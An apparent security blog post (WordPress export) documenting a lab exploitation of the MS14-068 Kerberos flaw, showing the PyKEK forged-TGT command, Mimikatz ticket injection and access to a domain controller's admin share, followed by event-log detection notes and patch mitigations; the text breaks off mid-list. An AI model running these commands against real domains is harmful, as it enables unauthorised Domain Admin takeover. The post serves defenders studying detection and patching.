{"id":676,"date":"2014-12-07T17:25:41","date_gmt":"2014-12-07T22:25:41","guid":{"rendered":"http:\/\/adsecurity.org\/?p=676"},"modified":"2016-02-16T23:41:28","modified_gmt":"2016-02-17T04:41:28","slug":"exploiting-ms14-068-vulnerable-domain-controllers-successfully-with-the-python-kerberos-exploitation-kit-pykek","status":"publish","type":"post","link":"https:\/\/adsecurity.org\/?p=676","title":{"rendered":"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)"},"content":{"rendered":"<h4><span style=\"text-decoration: underline;\">MS14-068 References:<\/span><\/h4>\n<ul>\n<li><a title=\"MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege\" href=\"https:\/\/adsecurity.org\/?p=525\">AD Kerberos Privilege Elevation Vulnerability: The Issue<\/a><\/li>\n<li><a title=\"Kerberos Vulnerability in MS14-068 Explained\" href=\"https:\/\/adsecurity.org\/?p=541\">Detailed Explanation of MS14-068<\/a><\/li>\n<li><a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK)<\/a><\/li>\n<li><a title=\"PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works\" href=\"https:\/\/adsecurity.org\/?p=763\">Detecting PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works<\/a><\/li>\n<\/ul>\n<p>After re-working my lab a bit, I set about testing the MS14-068 POC that Sylvain Monn\u00e9 posted to GitHub a few days ago. I configured a Windows 7 workstation with <a href=\"https:\/\/www.python.org\/downloads\/release\/python-278\/\">Python 2.7.8<\/a> and downloaded the<a href=\"https:\/\/github.com\/bidord\/pykek\/archive\/master.zip\"> PyKEK zip<\/a> as well as the <a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\/releases\/\">Mimikatz zip<\/a> file.<\/p>\n<p>The MS14-068.py Python script (part of PyKEK) can be run on any computer that has connectivity to the target Domain Controller.<\/p>\n<p>I ran <a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">PyKEK<\/a> against a Windows Server 2008 R2 Domain Controller not patched for MS14-068 using Kali Linux as well as a domain-joined Windows 7 workstation.<\/p>\n<p><strong>Note: All exploit stages can be executed without an admin account and can be performed on any computer on the network (including computers not domain-joined).<br \/>\n<\/strong>Microsoft KB3011780 patches this issue.<strong><br \/>\n<\/strong><\/p>\n<h3><strong>Updates:<\/strong><\/h3>\n<p><strong>12\/13 Update:<\/strong> Added a section on <strong>How Does PyKEK Get a Forged PAC\u00a0 into a TGT?<\/strong> with information on how PyKEK generates the forged TGT (valid TGT with a forged PAC).<br \/>\n<strong>12\/8 Update:<\/strong> I added a <strong>Mitigation<\/strong> section at the end of the post as well as events from a patched Domain Controller when attempting to exploit (in the events section).<br \/>\n<strong>12\/14 Update<\/strong>: I successfully ran the exploit using a non-domain joined Windows computer on the network without admin credentials.<\/p>\n<h3><strong>MS14-068 Exploit Issues with Windows Server 2012 &amp; 2012\/R2:<\/strong><\/h3>\n<p><em>I also stood up one Windows Server 2012 and one Windows Server 2012 R2 Domain Controller in the same site as the two unpatched Windows Server 2008 R2 DCs. None of the Domain Controllers in my lab.adsecurity.org AD Forest are patched for MS14-068.<br \/>\nAfter successfully running the PyKEK script to generate the TGT, I was unable to get a TGS successfully to exploit the 2008 R2 DC. After shutting down the 2012 &amp; 2012R2 DCs, I could use the forged TGT to get a TGS and access the targeted 2008 R2 DC (ADSDC02).<br \/>\nPyKEK is only sometimes successful when there is an unpatched DC and a patched DC in the same Active Directory site. The same behavior is noted when there is an unpatched Windows Server 2008 R2 DC and a Windows Server 2012 DC in the same site. Successful exploit depends on what DC PyKEK connects to.<\/em><strong><br \/>\n<\/strong><\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>Staging the Attack:<\/strong><\/span><\/h3>\n<p>The targeted user account in this post is &#8220;Darth Sidious&#8221; (darthsidious@lab.adsecurity.org). Note that this user is a member of Domain Users and a Workstation group. This group membership stays the same throughout the activity in this post (I took the screenshot after exploiting the DC). Assume that this user is an authorized user on the network and wants to get Domain Admin rights to perform nefarious actions. The user already has a valid domain account and knows the password for the domain. This is no different from an attacker spearphishing this user and stealing their credentials as they get local admin rights on the computer.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-DarthSidious-Account-MemberOf-Tab.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-690 aligncenter\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-DarthSidious-Account-MemberOf-Tab.png\" alt=\"ADS-DC-DarthSidious-Account-MemberOf-Tab\" width=\"317\" height=\"397\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-DarthSidious-Account-MemberOf-Tab.png 427w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-DarthSidious-Account-MemberOf-Tab-239x300.png 239w\" sizes=\"auto, (max-width: 317px) 100vw, 317px\" \/><\/a>Once the attacker has valid domain credentials (and local admin rights if Python install is required) on a computer on the network, they can leverage PyKEK to generate a forged TGT by performing standard communication with the target (unpatched) DC.<\/p>\n<p>The <a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">PyKEK<\/a> ms14-068.py Python script needs some information to successfully generate a forged TGT:<\/p>\n<ul>\n<li>User Principal Name (UPN) [-u]: darthsidious@lab.adsecurity.org<\/li>\n<li>User Password [-p]: TheEmperor99!<\/li>\n<li>User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-222232912<br \/>\n7-1110<\/li>\n<li>Targeted Domain Controller [-d]: adsdc02.lab.adsecurity.org<\/li>\n<\/ul>\n<p>The SID can be found by running the &#8220;whoami&#8221; command while logged in as the target user.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/DarthSidiousWhoAmI.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-702\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/DarthSidiousWhoAmI.png\" alt=\"DarthSidiousWhoAmI\" width=\"568\" height=\"417\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/DarthSidiousWhoAmI.png 877w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/DarthSidiousWhoAmI-300x219.png 300w\" sizes=\"auto, (max-width: 568px) 100vw, 568px\" \/><\/a><\/p>\n<p>You can also get this information from PowerShell by running :<\/p>\n<blockquote><p><em>\u00a0[Security.Principal.<wbr \/>WindowsIdentity]::GetCurrent( )<\/em><\/p><\/blockquote>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PowerShell-WhoAMI-DS.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-733\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PowerShell-WhoAMI-DS.png\" alt=\"ADS-PowerShell-WhoAMI-DS\" width=\"552\" height=\"148\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PowerShell-WhoAMI-DS.png 995w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PowerShell-WhoAMI-DS-300x80.png 300w\" sizes=\"auto, (max-width: 552px) 100vw, 552px\" \/><\/a><\/p>\n<p>As I noted in <a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">my previous post on PyKEK<\/a>, the following group membership is included in the forged TGT:<\/p>\n<ul>\n<li>Domain Users (513)<\/li>\n<li>Domain Admins (512)<\/li>\n<li>Schema Admins (518)<\/li>\n<li>Enterprise Admins (519)<\/li>\n<li>Group Policy Creator Owners (520)<\/li>\n<\/ul>\n<h3><span style=\"text-decoration: underline;\"><strong><br \/>\nPhase 1: Forging a TGT:<br \/>\n<\/strong><\/span><\/h3>\n<p>Here&#8217;s a screenshot of the exploit working in Kali Linux (1.09a)<\/p>\n<p><!--more--><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-PyKEk-Exploit.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-685 aligncenter\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-PyKEk-Exploit.png\" alt=\"ADS-Kali-MS14068-PyKEk-Exploit\" width=\"509\" height=\"345\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-PyKEk-Exploit.png 797w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-PyKEk-Exploit-300x203.png 300w\" sizes=\"auto, (max-width: 509px) 100vw, 509px\" \/><\/a><\/p>\n<p>After generating the ccache file containing the forged and validated TGT Kerberos ticket, the ccache file can be copied to a Windows computer to run Mimikatz.<\/p>\n<p>It works well on Windows running Python as well (command is in bold &amp; italics).<\/p>\n<blockquote><p><em><strong>c:\\Temp\\pykek&gt;ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-222232912<\/strong><\/em><br \/>\n<em><strong> 7-1110 -d adsdc02.lab.adsecurity.org<\/strong><\/em><\/p>\n<p>[+] Building AS-REQ for adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Sending AS-REQ to adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Receiving AS-REP from adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Parsing AS-REP from adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Building TGS-REQ for adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Sending TGS-REQ to adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n<strong>\u00a0 [+] Creating ccache file &#8216;TGT_darthsidious@lab.adsecurity.org.ccache&#8217;&#8230; Done!<\/strong><\/p><\/blockquote>\n<p>Here&#8217;s the screenshot of the ms14-068 exploit working on Windows (does not require admin rights)..<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-687\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration1.png\" alt=\"ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration\" width=\"750\" height=\"463\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration1.png 835w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration1-300x185.png 300w\" sizes=\"auto, (max-width: 750px) 100vw, 750px\" \/><\/a>I ran WireShark on the targeted Domain Controller. Here&#8217;s the pcap (zipped) of the network traffic from the PyKEK ms14-068.py script: <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADSecurityOrg-MS14068-Exploit-KRBPackets.zip\">ADSecurityOrg-MS14068-Exploit-KRBPackets<\/a><\/p>\n<p>Note that I have generated a forged TGT with a single, stolen domain account.<\/p>\n<p>The next step is to use this forged TGT, so I logon to a computer as the <em>local admin account<\/em> with network access to the targeted Domain Controller.<\/p>\n<p>Whoami shows I am logged on as admin on the computer ADSWKWIN7.<\/p>\n<p>Klist shows there are no Kerberos tickets in memory for this user (there wouldn&#8217;t be, this is a local admin account).<\/p>\n<p>The PyKEK ms14-068.py Python script saves the forged TGT to a ccache file (TGT_darthsidious@lab.adsecurity.org.ccache) in the current working directory (c:\\temp\\pykek shown above)<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>How Does PyKEK Get a Forged PAC\u00a0 into a TGT?<\/strong><\/span><\/h3>\n<p>The Python script performs a TGT request (Kerberos Authentication Service Request aka AS-REQ) and instead of requesting a TGT with a PAC (default AS-REQ), PyKEK requests a TGT with no PAC from the Domain Controller.<\/p>\n<p>Once the script receives the valid TGT without a PAC from the DC, the script generates a PAC (with the group membership listed above) packages it in encrypted authorization data as part of a TGS request to the DC (Kerberos Ticket Granting Service Request aka TGS-REQ) to obtain another TGT (a new one with the PyKEK generated PAC).<br \/>\n&#8220;The vulnerable KDC will verify it with MD5 and give you another TGT with a PAC in it&#8221;.<br \/>\nThis is the TGT that PyKEK saves to the ccache file used for stage 2.<\/p>\n<p>Since PyKEK communicates with the Domain Controller for valid TGTs, the TGT is a valid ticket (other than the forged PAC it includes). To summarize, there are two TGTs involved in the process: the original one without a PAC as a result of the first AS-REQ and a second one the DC delivers in the TGS-REP with the PyKEK generated PAC.<\/p>\n<p><em>NOTE: The TGT is technically not modified by PyKEK since it is encrypted by the KDC account (KRBTGT). The process the script uses results in a valid TGT with the PAC PyKEK created that is accepted by an unpatched DC. The genius part of this is that PyKEK uses the Kerberos AS &amp; TGS exchanges to forge a PAC and have the DC place it into a new user TGT. Then when the TGT is presented later on in Stage 2 for a valid TGS, the PAC is accepted and its values carried on into the new TGS for a Kerberos service in AD.<br \/>\n<\/em><\/p>\n<p><strong>Packet detail and additional information posted in the post &#8220;<a title=\"PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works\" href=\"https:\/\/adsecurity.org\/?p=763\">PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works<\/a>&#8220;<\/strong><\/p>\n<p>Benjamin Delpy&#8217;s <a href=\"http:\/\/blog.gentilkiwi.com\/mimikatz\">Mimikatz<\/a> presentation at Passwords 2014 describes the MS14-068 exploit (slide below extracted from his presentation). You can watch Benjamin&#8217;s presentation <a href=\"http:\/\/new.livestream.com\/NTNU\/passwords14\/videos\/70751388?t=1418474079423\">here <\/a>(2 video from the top). I updated my ealier <a href=\"https:\/\/adsecurity.org\/?p=525\">MS14-068 post that describes the issue with PAC validation<\/a> based on information Benjamin provided during this presentation.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-744 aligncenter\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068.png\" alt=\"py-Passwords2014Slides-PACsig1-MS14068\" width=\"749\" height=\"421\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068.png 1334w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068-300x168.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068-1024x575.png 1024w\" sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/a>(Thanks Banjamin for your continued efforts to make sure I get this right. \ud83d\ude42 )<\/p>\n<p>&nbsp;<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>Phase 2: Injecting the forged TGT and gaining a valid TGS:<\/strong><\/span><\/h3>\n<p>After the forged Kerberos TGT ticket is generated, it&#8217;s time to inject it into the current user session using <a href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz <\/a>(command is in bold &amp; italics).<\/p>\n<blockquote><p><em><strong>c:\\Temp\\pykek&gt;c:\\temp\\mimikatz\\mimikatz.exe &#8220;kerberos::ptc c:\\temp\\TGT_darthsidious@lab.adsecurity.org.ccache&#8221; exit<\/strong><\/em><\/p>\n<p>.#####.\u00a0\u00a0 mimikatz 2.0 alpha (x64) release &#8220;Kiwi en C&#8221; (Nov 20 2014 01:35:45)<br \/>\n.## ^ ##.<br \/>\n## \/ \\ ##\u00a0 \/* * *<br \/>\n## \\ \/ ##\u00a0\u00a0 Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )<br \/>\n&#8216;## v ##&#8217;\u00a0\u00a0 http:\/\/blog.gentilkiwi.com\/mimikatz\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 (oe.eo)<br \/>\n&#8216;#####&#8217;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 with 15 modules * * *\/<\/p>\n<p>mimikatz(commandline) # kerberos::ptc c:\\temp\\TGT_darthsidious@lab.adsecurity.org.ccache<br \/>\nPrincipal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG<br \/>\nData 0<br \/>\nStart\/End\/MaxRenew: 12\/7\/2014 3:10:30 PM ; 12\/8\/2014 1:10:30 AM ; 12\/14\/2014 3:10:30 PM<br \/>\nService Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG<br \/>\nTarget Name\u00a0 (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG<br \/>\nClient Name\u00a0 (01) : darthsidious ; @ LAB.ADSECURITY.ORG<br \/>\nFlags 50a00000\u00a0\u00a0\u00a0 : pre_authent ; renewable ; proxiable ; forwardable ;<br \/>\nSession Key\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x00000017 &#8211; rc4_hmac_nt<br \/>\naf5e7b47316c4cebae0a7ead04059799<br \/>\nTicket\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x00000000 &#8211; null\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; kvno = 2\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [&#8230;]<br \/>\n<strong>\u00a0 * Injecting ticket : OK<\/strong><\/p>\n<p>mimikatz(commandline) # exit<br \/>\nBye!<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p>Note that since I am injecting the forged TGT which states that I am a member of Domain Admins, Enterprise Admins, etc into my session, when this TGT is passed to an unpatched DC for a Kerberos service ticket (TGS), the service ticket will show I am a member of these groups. When the TGS is presented to a service, the user account is treated as if it is a member of these groups, though viewing the group membership shows the user is conspicuously absent. This enables an attacker to act as if they are a member of groups when they are not.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-684\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS.png\" alt=\"ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS\" width=\"632\" height=\"637\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS.png 960w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS-297x300.png 297w\" sizes=\"auto, (max-width: 632px) 100vw, 632px\" \/><\/a><\/p>\n<p>I ran WireShark on the targeted Domain Controller. Here&#8217;s the pcap (zipped) of the network traffic using the forged TGT ticket via <a href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz <\/a>and connecting to the Domain Controller&#8217;s Admin$ share: <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access.zip\">ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access<\/a><\/p>\n<p>Once I have successfully injected the forged TGT into my session (remember, I am logged onto a domain-joined Windows 7 computer as the <strong>local admin &#8211; not with AD domain credentials<\/strong>), I leverage this to connect to the Domain Controller and gain access to the Active Directory database (ntds.dit).<br \/>\nNote: a local admin account is NOT required. This stage can be executed with any account and can be run from a PowerShell window.<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>Domain Controller Event Logs from the Attack:<br \/>\n<\/strong><\/span><\/h3>\n<h4><strong><span style=\"text-decoration: underline;\">Unpatched Domain Controller Logs During the PyKEK MS14-068 Attack:<\/span><\/strong><\/h4>\n<p>Here are the event logs on the targeted Domain Controller when using the forged TGT to get a TGS in order to access the Domain Controller&#8217;s admin$ share and locate the AD database files:<\/p>\n<p><strong>Event 4769<\/strong> shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-691\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769.png\" alt=\"ADS-DC-MS14068-Event1-4769\" width=\"519\" height=\"516\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769.png 636w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769-300x298.png 300w\" sizes=\"auto, (max-width: 519px) 100vw, 519px\" \/><\/a><\/p>\n<p><strong>Event 4769<\/strong> shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-692\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769.png\" alt=\"ADS-DC-MS14068-Event2-4769\" width=\"513\" height=\"513\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769.png 635w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769-300x300.png 300w\" sizes=\"auto, (max-width: 513px) 100vw, 513px\" \/><\/a><\/p>\n<p><strong>Event 4624 <\/strong>shows darthsidious@lab.adsecurity.org using the TGS service ticket to logon to the target Domain Controller.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-693\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624.png\" alt=\"ADS-DC-MS14068-Event3-4624\" width=\"509\" height=\"505\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624.png 639w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624-300x297.png 300w\" sizes=\"auto, (max-width: 509px) 100vw, 509px\" \/><\/a><\/p>\n<p><strong>Event 5140 <\/strong>shows darthsidious@lab.adsecurity.org using the TGS service ticket to connect to the target Domain Controller&#8217;s Admin$ share (net use \\\\adsdc02.lab.adsecurity.org\\admin$) which only an administrator has access.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-694\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140.png\" alt=\"ADS-DC-MS14068-Event4-5140\" width=\"500\" height=\"500\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140.png 636w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140-300x300.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/p>\n<p><strong>Event 4672 <\/strong>shows darthsidious@lab.adsecurity.org successfully authenticated (and logged on to) the target Domain Controller which only an administrator has access.<\/p>\n<p><em>Note that this user has SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeTakeOwnership, etc <strong>showing the user has full Admin access to this computer. It&#8217;s Game Over at this point.<\/strong><\/em><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-695\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672.png\" alt=\"ADS-DC-MS14068-Event5-4672\" width=\"486\" height=\"482\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672.png 638w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672-300x297.png 300w\" sizes=\"auto, (max-width: 486px) 100vw, 486px\" \/><\/a><\/p>\n<h4><strong><span style=\"text-decoration: underline;\">MS14-068 Patched Domain Controller Logs During the PyKEK MS14-068 Attack:<\/span><\/strong><\/h4>\n<h5>Here&#8217;s what it looks like when a client attempts to use a forged TGT to get a Kerberos service ticket (TGS) when communicating with a patched DC:<\/h5>\n<p><strong>Event 4769 <\/strong>shows darthsidious@lab.adsecurity.org attempting to get a Kerberos service ticket (TGS) for a CIFS (SMB) share on the Domain Controller (adsdc01.lab.adsecurity.org). The TGS fails because the DC\u00a0 (adsdc01.lab.adsecurity.org) is patched an logs this failure in the security event log as a failed 4769 event. .<br \/>\n<strong>NOTE: This is the event Microsoft recommends you monitor closely after applying KB3011780 (the MS14-068 patch).<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent1-4769Failure.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-724\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent1-4769Failure.png\" alt=\"ADS-DC-MS14068-PatchedEvent1-4769Failure\" width=\"481\" height=\"426\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent1-4769Failure.png 711w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent1-4769Failure-300x265.png 300w\" sizes=\"auto, (max-width: 481px) 100vw, 481px\" \/><\/a><\/p>\n<p><strong>Event 4776 <\/strong>shows an audit failure for the computer and the username logged into the computer. This event is associated with the <strong>4769<\/strong> event above. Since I was logged on as the local administrator account &#8220;admin&#8221; it shows in the log. This is a red flag. <em>However, I could have created a local admin account on the box with the same name as a Domain Admin in the domain and it may not be scrutinized as much. Check your logs!<\/em><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent2-4776-Failure.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-725\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent2-4776-Failure.png\" alt=\"ADS-DC-MS14068-PatchedEvent2-4776-Failure\" width=\"490\" height=\"435\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent2-4776-Failure.png 708w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent2-4776-Failure-300x266.png 300w\" sizes=\"auto, (max-width: 490px) 100vw, 490px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p><strong>T<\/strong>his concludes the lesson on how to own an Active Directory forest in less than 5 minutes with only a user account and a connected Windows computer (and associated admin account).<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>Mitigations:<\/strong><\/span><\/h3>\n<ol>\n<li><strong>Patch all Domain Controllers<\/strong> with KB3011780 in every AD domain. I uploaded a sample script for getting\u00a0KB3011780 patch status for all Domain Controllers: <a 